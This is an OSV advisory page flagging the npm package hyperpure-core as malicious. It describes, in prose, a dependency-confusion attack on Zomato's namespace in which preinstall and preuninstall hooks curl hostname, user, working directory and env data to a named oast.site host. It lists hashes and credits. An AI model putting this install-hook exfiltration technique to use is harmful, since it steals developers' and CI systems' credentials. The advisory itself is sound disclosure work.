MAL-2026-6250

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/hyperpure-core/MAL-2026-6250.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-6250

Published

2026-06-21T16:21:08Z

Modified

2026-06-24T03:31:23.576135478Z

Summary

Malicious code in hyperpure-core (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (47dd43b980c7b5e3230ee57e6974d40804e54997ed88877ced301402dbcdef4c)

Package impersonates a Zomato internal namespace (name hyperpure-core, repository URL pointing to github.com/zomato/hyperpure-core) while shipping a 63-byte stub index.js that exports nothing functional. The package.json preinstall (and preuninstall) lifecycle script runs at npm install time and uses curl to POST the installer's hostname -f, whoami, current working directory, and the full env output (base64-encoded) to http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site over plaintext HTTP. On CI / developer machines the captured environment routinely contains credential-grade values (AWS_*, NPMTOKEN, GHTOKEN, CI provider secrets), so this is unambiguous installer-side credential and host-identity exfiltration. The shape (internal-name impersonation + hollow module + env-leaking preinstall + OAST out-of-band callback) is a textbook dependency-confusion attack against Zomato build infrastructure.

Source: ossf-package-analysis (1646c4910046d5c497ba97d75067f1b566f5bfe79ba938e0b9d06eda3b2eefa3)

The OpenSSF Package Analysis project identified 'hyperpure-core' @ 1.0.0 (npm) as malicious.

It is considered malicious because:

The package communicates with a domain associated with malicious activity.
The package executes one or more commands associated with malicious behavior.

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "1646c4910046d5c497ba97d75067f1b566f5bfe79ba938e0b9d06eda3b2eefa3",
            "import_time": "2026-06-21T16:38:03.237191602Z",
            "source": "ossf-package-analysis",
            "modified_time": "2026-06-21T16:21:08Z",
            "versions": [
                "1.0.0"
            ]
        },
        {
            "sha256": "47dd43b980c7b5e3230ee57e6974d40804e54997ed88877ced301402dbcdef4c",
            "import_time": "2026-06-24T03:14:01.550177186Z",
            "source": "amazon-inspector",
            "modified_time": "2026-06-24T02:44:54Z",
            "versions": [
                "1.0.0"
            ],
            "id": "IN-MAL-2026-007399"
        }
    ]
}

References

https://www.npmjs.com/package/hyperpure-core/v/1.0.0

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com
- OpenSSF: Package Analysis - FINDER
- - https://github.com/ossf/package-analysis
  - https://openssf.slack.com/channels/package_analysis

Affected packages

npm / hyperpure-core

Package

Name: hyperpure-core; View open source insights on deps.dev
Purl: pkg:npm/hyperpure-core

Affected ranges

Affected versions

1.*

1.0.0

Database specific

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/hyperpure-core/MAL-2026-6250.json"

cwes

[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]

indicators

{
    "evidence_files": [
        {
            "sha256": "8274b3c72accc032639be59965255437eeca7b6f02b4c151f552442248c85405",
            "tlsh": "8901c924693896b33d9c4a70ba2a406d7a617f0f84fc2c005e9b111d828f215232d72b",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "filename": "hyperpure-core-1.0.0.tgz",
            "hashes": {
                "sha1": "f838ff03ee730fed3168e840e4245273472a4139",
                "sha512_sri": "sha512-U0hVw+RveRgu1Ud8p4SUeWFa1qlGEA/mZv4Sx49OHNHRdRJyMfpz31B61JcsSN8AtpLlgdlTBNqpbo2tDZWAKw=="
            }
        }
    ]
}